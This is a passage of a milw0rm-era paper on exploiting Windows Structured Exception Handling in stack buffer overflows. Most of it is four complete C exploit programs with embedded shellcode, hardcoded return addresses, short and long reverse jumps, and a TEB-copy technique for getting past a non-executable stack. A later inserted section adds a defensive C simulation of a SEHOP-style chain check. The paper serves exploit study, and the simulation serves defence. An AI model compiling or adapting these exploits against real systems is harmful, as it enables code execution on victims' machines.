7C9037B7    FF75 08         PUSH DWORD PTR SS:[EBP+8]
7C9037BA    8B4D 18         MOV ECX,DWORD PTR SS:[EBP+18]  <-- *handler to ECX
7C9037BD    FFD1            CALL ECX                  <-- jump to exception handler procedure

So, when Windows passes control to the exception handler procedure, the EBX
register contains 0. We cannot simply jump to EBX because this would raise another
exception and the program would be terminated immediately. The situation seems very
bad, but if we just look at the stack image before the execution of the *handler procedure
we will find the solution very quickly.

ESP   ->   the return address (somewhere in ntdll.dll)
ESP+4 ->   the exception's indicator
ESP+8 ->   the address of the EXCEPTION_REGISTRATION structure

So, instead of jumping to EBX we can:

1. jmp dword ptr[esp+8]
2. pop - pop - ret

The second sequence adds 8 to ESP and then jumps to the address that is on
top of the stack.

Now we know everything, so we can start exploiting SEH :)


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit1.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                          (classic overflow)


As I wrote before, we pass the following string to vuln.exe:

                        +--------->-------->-----------+
                        |                              |
[416 bytes of trash][jmp 6][jmp ebx, pop-pop-ret][some NOPs][shellcode]


--------------------------------exploit1.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x79396DBE    // the address of jmp ebx (win2000) or pop-pop-ret (win XP SP2)
#define JUMP 0x909006EB   // jmp 6

#define TRASH 0x41

char shellcode[]=
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";

int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;
char *ptr = buf;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

for(i=0;i<416;i++)
(*ptr++) = TRASH;

*(unsigned long *)&buf[416] = JUMP;
*(unsigned long *)&buf[420] = RET;
strcat(buf, "\x90\x90\x90\x90");
strcat(buf, shellcode);
bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);	
return 0;
}
--------------------------------exploit1.c-------------------------------


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit2.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                  (using 2 bytes short reverse jump)


Another interesting way to abuse SEH is to use a 2-byte short reverse jump.
Instead of placing the shellcode behind the EXCEPTION_REGISTRATION structure, we put it
in vuln.exe's buffer and use a short reverse jump to execute the code.
A great article about 2-byte short reverse jumps can be found at [2].


       +-------<----------<-------<-----------+
       |                                      |
[NOP Sledge][shellcode][some NOPS][short reverse jump][jmp ebx, pop-pop-ret]


--------------------------------exploit2.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define RET 0x79392C0B      //jmp ebx, pop-pop-ret
#define JUMP 0x909080EB     //short reverse jump (jmp 80)

#define TRASH 0x90

char shellcode[] = 
"\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5B\x33\xC9\x83\xC3"
"\x35\x88\x0B\x83\xEB\x06\x53\xB8\xCF\x05\x35\x79\xFF\xD0"
"\x33\xC9\x51\x53\x53\x51\x05\x11\x11\x11\x11\x2D\x79\x90"
"\x0E\x11\xFF\xD0\x33\xC9\x51\xB8\x1A\xE0\x34\x79\xFF\xD0"
"\x75\x73\x65\x72\x33\x32\x61";
                
int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;
char *ptr = buf;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

for(i=0;i<310;i++)
(*ptr++) = TRASH;

strcat(buf, shellcode);                  
for(i=sizeof(shellcode)+307;i<416;i++)
strcat(buf, "\x90");

*(unsigned long *)&buf[416] = JUMP;
*(unsigned long *)&buf[420] = RET;

bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);	
return 0;
}
--------------------------------exploit2.c-------------------------------


As you can see, it is very important to jump to the NOPs before the shellcode.
Short jumps are... SHORT !!! :) so the shellcode should be as near as possible to
the EXCEPTION_REGISTRATION structure.


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit3.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                      (using long reverse jump)


Until now we have been playing with a quite small (short) shellcode (the first one).
To execute larger shellcodes (400 bytes in our case) we have to find
a place for it. Here the knowledge from my paper [1] will be very useful.
As you probably know, we cannot use the first method to execute our second
shellcode because the shellcode would be cut off. The second method, with the short
jump, would also fail because the range of the jump is too small: it cannot jump
back over 400 bytes of shellcode plus some NOPs.

A good idea is a small modification of the second method. We also place our
shellcode in vuln.exe's buffer and we ALSO jump there, but in another way :)
To accomplish it, we have to know the approximate location of the shellcode
on the stack. In the case of Win2000 it is very simple, because the EBX register
points to the current EXCEPTION_REGISTRATION structure, so the buffer must be
somewhere before the structure.

But on Win XP SP1 there is a problem, because the EBX register is zeroed, therefore
we have to find another point of reference from which to compute the address where
the shellcode was placed. We can use the current stack pointer (ESP). But this time
we have to add a value to ESP and then jump.


--------------------------------exploit3.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>             //memset, strcpy, strcat
#include <process.h>            //execve
#include <windows.h>

#define RET 0x79392C0B          //jmp ebx or pop-pop-ret (overwrites the handler field)
#define JUMP 0x909006EB         //jmp +6 followed by two NOPs (overwrites the 'prev' field)

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

//NOTE!: only ONE minicode may be defined. Instead of deleting the needless one,
//compile with -DEBX_ADDRESSING for the EBX-based variant; without it the
//ESP-based variant is used.
#ifdef EBX_ADDRESSING
/* WIN 2000 and XP unpatched
 * EBX-based addressing
 */
char minicode[] =
"\x66\x81\xeb\xa0\x01"  //sub bx, 0x1A0
"\xff\xe3";             //jmp bx
#else
/* WIN2000, WINXP
 * Current stack pointer-based addressing
 */
char minicode[]=
"\x89\xe0"           //mov eax, esp
"\x66\x05\xe4\x03"   //add ax, 0x3E4
"\xff\xe0";          //jmp eax
#endif

int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

strcpy(buf, "\x90\x90\x90\x90");         //leading NOPs
strcat(buf, shellcode);                  //the 400-byte shellcode
for(i=sizeof(shellcode);i<416;i++)
strcat(buf, "\x90");                     //pad with NOPs up to the EXCEPTION_REGISTRATION structure

*(unsigned long *)&buf[416] = JUMP;      //'prev' field  <- jmp +6
*(unsigned long *)&buf[420] = RET;       //handler field <- jmp ebx / pop-pop-ret
strcat(buf, "\x90\x90\x90\x90");         //landing NOPs for the jmp +6
strcat(buf, minicode);                   //the long reverse jump back to the shellcode
bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);
return 0;
}
--------------------------------exploit3.c-------------------------------

Of course there is also a possibility to use EIP to address the shellcode.
Just use this trick:

  jmp a
  b:pop ebx    <--- now the EIP value (the address after 'call b') is in the EBX register

  //code       <--- here place your code (sub or add, and then jump)

  a:call b


@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
&>&>&<&><&>&<>&<>&<&><&>666[***exploit4.c]666<&><&>&<>&<>&<&><&>&<&<&
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                       (execution in TEB block)


The last method is very interesting because if the stack is configured to
forbid the execution of code placed on it, this method bypasses that. How?
All the details are in my paper [1]; here I write only the general concept.
In TEB blocks there are some free locations that are not used. For example,
starting from 0x7FFDE1BC there is a buffer containing only NULL bytes, which
we can overwrite. So vuln.exe's buffer should look like the following:

[NOPs][shellcode][NOP][jump 6][call ebx, pop-pop-ret][NOP][BUF_ADDR][TEB][TEB][JUMP lstrcpyA]

where:

BUF_ADDR        --> the address of the buffer with the shellcode placed on the stack
TEB             --> the address in the TEB block where we copy our shellcode, and also
                    the return address for lstrcpyA (so the TEB block either ;])
JUMP lstrcpyA   --> a jump to a function that copies data (lstrcpyA, lstrcatA and so on)

--------------------------------exploit4.c-------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>      //memset, strcpy, strcat
#include <process.h>     //execve
#include <windows.h>

#define RET 0x79392C0B   //jmp ebx, pop-pop-ret (overwrites the handler field)
#define JUMP 0x909006EB  //jmp +6 followed by two NOPs (overwrites the 'prev' field)

//NOTE: only ONE minicode may be defined. Instead of deleting the needless one,
//compile with -DEBX_ADDRESSING for the EBX-based variant; without it the
//ESP-based variant is used.
#ifdef EBX_ADDRESSING
//For Win2000 and XP unpatched
char minicode[]=
"\xb8\x5C\xDF\x35\x79"   //mov eax, STRCPY_FUNC  <-- lstrcpyA's address
"\x66\x81\xeb\x9f\x01"   //sub bx, 0x19F         <-- EBX should point to the NOP sled before the shellcode
"\x53"                   //push ebx              <-- push the address of the buffer on the stack
"\x68\xbc\xe1\xfd\x7f"   //push TEB              <-- copy to 0x7FFDE1BC
"\x68\xbc\xe1\xfd\x7f"   //push TEB              <-- and return to 0x7FFDE1BC
"\xff\xe0";              //jmp eax               <-- jump to lstrcpyA
#else
//For Win2000, XP SP0-1
char minicode[]=
"\x89\xe3"               //mov ebx, esp
"\x66\x81\xc3\xe4\x03"   //add bx, 0x3E4         <-- EBX should point to the NOP sled before the shellcode
"\xb8\x5C\xDF\x35\x79"   //mov eax, STRCPY_FUNC  <-- lstrcpyA's address
"\x53"                   //push ebx              <-- source: the buffer on the stack
"\x68\xbc\xe1\xfd\x7f"   //push TEB              <-- destination: 0x7FFDE1BC
"\x68\xbc\xe1\xfd\x7f"   //push TEB              <-- return address: 0x7FFDE1BC
"\xff\xe0";              //jmp eax               <-- jump to lstrcpyA
#endif

char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";

int main(int argc, char *argv[])
{
char *bufExe[3];
char buf[700];
int i;

memset(buf, 0, sizeof(buf));
bufExe[0] = "vuln.exe";
bufExe[2] = NULL;

strcpy(buf, "\x90\x90\x90\x90");         //leading NOPs
strcat(buf, shellcode);                  //the shellcode that lstrcpyA will copy into the TEB
for(i=sizeof(shellcode);i<416;i++)
strcat(buf, "\x90");                     //pad with NOPs up to the EXCEPTION_REGISTRATION structure

*(unsigned long *)&buf[416] = JUMP;      //'prev' field  <- jmp +6
*(unsigned long *)&buf[420] = RET;       //handler field <- jmp ebx / pop-pop-ret
strcat(buf, "\x90");                     //landing NOP for the jmp +6
strcat(buf, minicode);                   //sets up the lstrcpyA call into the TEB

bufExe[1] = buf;
execve(bufExe[0],bufExe,NULL);
return 0;
}
--------------------------------exploit4.c-------------------------------
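Both exploit3.c and exploit4.c leave the same two values in the overwritten EXCEPTION_REGISTRATION record: JUMP (0x909006EB) in the 'prev' field and RET (0x79392C0B) in the handler field. The example below is added here and is not part of the paper: it is a portable C simulation of the chain-integrity check that later Windows releases run as SEHOP before dispatching an exception. It walks the list from fs:[0] to the 0xFFFFFFFF terminator and requires every record to lie on the stack, in ascending order, with a handler that is not on the stack and is inside a mapped module. The stack window, the module ranges and the legitimate handler addresses are constructed values; only JUMP and RET are taken from the exploits above. The walk rejects the overwritten chain at the second record, because 0x909006EB is not a stack address, even though the handler itself still points into a module, which a handler-only check (SafeSEH, for a module that carries no handler table) would let through.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated 32-bit thread stack: a 4 KiB window starting at STACK_BASE (constructed). */
#define STACK_BASE   0x0012E000u
#define STACK_SIZE   0x1000u
#define STACK_LIMIT  (STACK_BASE + STACK_SIZE)
#define CHAIN_END    0xFFFFFFFFu   /* 'prev' value that terminates the SEH chain */

/* The two values the paper's exploit3.c / exploit4.c write into the record. */
#define PAPER_JUMP   0x909006EBu   /* jmp +6; nop; nop  -> lands in the 'prev' field   */
#define PAPER_RET    0x79392C0Bu   /* jmp ebx / pop-pop-ret -> lands in the handler field */

/* Address ranges where a legitimate handler may live (constructed; a real check takes
 * them from the loaded-module list). Range B deliberately covers PAPER_RET so that a
 * handler-only check accepts it. */
typedef struct { uint32_t lo, hi; } range_t;
static const range_t image_ranges[] = {
    { 0x00400000u, 0x00410000u },   /* constructed: the main executable */
    { 0x79300000u, 0x79400000u },   /* constructed: a DLL containing PAPER_RET */
};

static uint8_t stack_mem[STACK_SIZE];

static uint32_t rd32(uint32_t addr) { uint32_t v; memcpy(&v, &stack_mem[addr - STACK_BASE], 4); return v; }
static void     wr32(uint32_t addr, uint32_t v) { memcpy(&stack_mem[addr - STACK_BASE], &v, 4); }

/* A whole 8-byte EXCEPTION_REGISTRATION record must fit on the stack, 4-byte aligned. */
static int record_on_stack(uint32_t a) { return a >= STACK_BASE && a <= STACK_LIMIT - 8 && (a & 3u) == 0; }
static int addr_on_stack(uint32_t a)   { return a >= STACK_BASE && a < STACK_LIMIT; }
static int addr_in_image(uint32_t a) {
    for (size_t i = 0; i < sizeof image_ranges / sizeof image_ranges[0]; i++)
        if (a >= image_ranges[i].lo && a < image_ranges[i].hi) return 1;
    return 0;
}

enum seh_verdict {
    SEH_OK = 0,
    SEH_RECORD_OFF_STACK,     /* a 'prev' pointer leaves the stack without being CHAIN_END */
    SEH_NOT_ASCENDING,        /* records must move toward higher addresses */
    SEH_HANDLER_ON_STACK,     /* handler points into the stack itself */
    SEH_HANDLER_NOT_IN_IMAGE, /* handler points where no module is mapped */
    SEH_NO_TERMINATOR         /* chain never reaches CHAIN_END (loop or runaway) */
};

/* Walk the chain from fs:[0] (here: 'head') to the terminator, as a SEHOP-style check does. */
enum seh_verdict validate_seh_chain(uint32_t head) {
    uint32_t cur = head, last = 0;
    int n = 0;
    while (cur != CHAIN_END) {
        if (!record_on_stack(cur))   return SEH_RECORD_OFF_STACK;
        if (n > 0 && cur <= last)    return SEH_NOT_ASCENDING;
        uint32_t handler = rd32(cur + 4);
        if (addr_on_stack(handler))  return SEH_HANDLER_ON_STACK;
        if (!addr_in_image(handler)) return SEH_HANDLER_NOT_IN_IMAGE;
        last = cur;
        cur  = rd32(cur);
        if (++n > 64)                return SEH_NO_TERMINATOR;
    }
    return SEH_OK;
}

/* Lay out three legitimate records (innermost first) and return the chain head. */
uint32_t build_clean_chain(void) {
    memset(stack_mem, 0, sizeof stack_mem);
    uint32_t r0 = STACK_BASE + 0x600, r1 = STACK_BASE + 0x900, r2 = STACK_BASE + 0xF00;
    wr32(r0, r1);        wr32(r0 + 4, 0x00401230u);   /* constructed handlers in the exe */
    wr32(r1, r2);        wr32(r1 + 4, 0x00402A80u);
    wr32(r2, CHAIN_END); wr32(r2 + 4, 0x00405F10u);
    return r0;
}

/* Reproduce the state the paper's overflow leaves in the innermost record. */
enum seh_verdict check_after_paper_overwrite(void) {
    uint32_t head = build_clean_chain();
    wr32(head,     PAPER_JUMP);   /* 'prev' field */
    wr32(head + 4, PAPER_RET);    /* handler field */
    return validate_seh_chain(head);
}

/* A second constructed case: the handler is pointed straight into the stack buffer. */
enum seh_verdict check_after_stack_handler_overwrite(void) {
    uint32_t head = build_clean_chain();
    wr32(head + 4, STACK_BASE + 0x200);   /* constructed stack address */
    return validate_seh_chain(head);
}

int main(void) {
    printf("clean chain:      %d\n", validate_seh_chain(build_clean_chain()));
    printf("paper overwrite:  %d\n", check_after_paper_overwrite());
    printf("handler on stack: %d\n", check_after_stack_handler_overwrite());
    return 0;
}
```

The verdict codes show which invariant fails: the paper's overwrite is caught as SEH_RECORD_OFF_STACK (1) on the walk to the second record, while the handler-on-stack variant is caught by the handler test (3). The ordering rule matters because every exception dispatch begins at fs:[0], so a corrupt record anywhere in the list is reached before the dispatcher ever calls a handler.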


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                   [>>5<<]. Summary                      <
>---------------------------------------------------------<


In this paper I have described how SEH works, how to use it and how to abuse
it :). The knowledge from this paper provides a firm basis for further research
on bypassing /SAFESEH, /GS or the stack protection in Windows Server 2003. In
the near future the DaRk-CodeRs Group (maybe it will be me once again) will
probably publish the results of our research :)
Stay tuned!!!

All questions, suggestions, comments -> e-mail address is in the title;]


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                [>>6<<]. Further reading                 <
>---------------------------------------------------------<


[1]  paper: "Shellcode locations and buffer overflows in Windows" at
     www.milw0rm.com/papers/205 | www.packetstormsecurity.com/shellcode/shellcode-locations.txt
[2]  paper: http://mirror.href.com/thestarman/asm/2bytejumps.htm
[3]  paper: http://www.eeye.com/html/resources/newsletters/vice/VI20060830.html
[4]  paper: www.ngssoftware.com/papers/NISR.BlindExploitation.pdf
[5]  paper: www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf
[6]  book : Jack Koziol - "The Shellcoder's Handbook"
[7]  book : Eldad Eilam - "Reversing: Secrets of Reverse Engineering"


><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><
>                 [>>7<<]. Greetz                         <
>---------------------------------------------------------<


Hard case :) Generally, I thank all the people I know (eeemmm, and like, of course ;]).
You all have contributed something to this paper and to my life ;]. Particularly:
Ola N. (for everything: thanks baby :*), Mr. Piotr S. (for technical support (especially
for provisions :)) and for everything else), Pawel J. (for friendship), 0in (for forcing me
to write about fuckin' SEH), c0ndemned, Die_Angel, m4r1usz, Katharsis (for "mental" support :)),
e.wiZz (hope you're doin' better; keep on fighting), Dobosz (for the Steam account), wilm@n,
Konrad CZ.



Stay secure


==[END OF FUCKIN' FILE]==

# milw0rm.com [2008-08-18]